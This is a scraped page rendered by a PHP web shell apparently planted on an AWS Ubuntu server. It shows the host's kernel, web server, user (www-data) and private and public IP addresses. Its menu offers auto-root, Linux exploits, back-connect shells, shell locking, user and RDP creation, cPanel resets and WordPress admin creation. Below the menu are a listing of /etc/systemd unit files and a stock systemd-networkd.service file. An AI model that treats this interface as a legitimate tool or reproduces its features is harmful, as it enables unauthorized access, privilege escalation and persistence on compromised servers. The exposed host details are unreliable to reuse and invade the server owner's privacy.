Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.17.154.155
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2.service
346
B
-rw-r--r--
atd.service
169
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
251
B
-rw-r--r--
ebtables.service
456
B
-rw-r--r--
hibinit-agent.service
308
B
-rw-r--r--
irqbalance.service
368
B
-rw-r--r--
lxcfs.service
311
B
-rw-r--r--
lxd-containers.service
320
B
-rw-r--r--
mysql.service
467
B
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
ondemand.service
362
B
-rw-r--r--
open-vm-tools.service
498
B
-rw-r--r--
pollinate.service
358
B
-rw-r--r--
remote-fs.target
522
B
-rw-r--r--
rsync.service
188
B
-rw-r--r--
rsyslog.service
290
B
-rw-r--r--
snap-amazon\x2dssm\x2dagent-11...
359
B
-rw-r--r--
snap-amazon\x2dssm\x2dagent-98...
356
B
-rw-r--r--
snap-core18-2846.mount
326
B
-rw-r--r--
snap-core18-2855.mount
326
B
-rw-r--r--
snap-core22-1908.mount
326
B
-rw-r--r--
snap-core22-1963.mount
326
B
-rw-r--r--
snap-snapd-23771.mount
326
B
-rw-r--r--
snap-snapd-24505.mount
326
B
-rw-r--r--
snap.amazon-ssm-agent.amazon-s...
589
B
-rw-r--r--
snapd.aa-prompt-listener.servi...
297
B
-rw-r--r--
snapd.apparmor.service
880
B
-rw-r--r--
snapd.autoimport.service
432
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
322
B
-rw-r--r--
snapd.service
590
B
-rw-r--r--
ssh.service
493
B
-rw-r--r--
systemd-networkd.service
1.88
KB
-rw-r--r--
systemd-resolved.service
1.67
KB
-rw-r--r--
ufw.service
266
B
-rw-r--r--
unattended-upgrades.service
372
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-networkd.service
# SPDX-License-Identifier: LGPL-2.1+ # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Service Documentation=man:systemd-networkd.service(8) ConditionCapability=CAP_NET_ADMIN DefaultDependencies=no # systemd-udevd.service can be dropped once tuntap is moved to netlink After=systemd-udevd.service network-pre.target systemd-sysusers.service systemd-sysctl.service Before=network.target multi-user.target shutdown.target Conflicts=shutdown.target Wants=network.target [Service] Type=notify Restart=on-failure RestartSec=0 ExecStart=!!/lib/systemd/systemd-networkd WatchdogSec=3min User=systemd-network CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW ProtectSystem=strict ProtectHome=yes ProtectControlGroups=yes ProtectKernelModules=yes MemoryDenyWriteExecute=yes RestrictRealtime=yes RestrictSUIDSGID=yes RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 AF_PACKET SystemCallFilter=~@clock @cpu-emulation @debug @keyring @module @mount @obsolete @raw-io @reboot @swap SystemCallArchitectures=native LockPersonality=yes RuntimeDirectory=systemd/netif RuntimeDirectoryPreserve=yes [Install] WantedBy=multi-user.target Also=systemd-networkd.socket Alias=dbus-org.freedesktop.network1.service # We want to enable systemd-networkd-wait-online.service whenever this service # is enabled. systemd-networkd-wait-online.service has # WantedBy=network-online.target, so enabling it only has an effect if # network-online.target itself is enabled or pulled in by some other unit. Also=systemd-networkd-wait-online.service
Close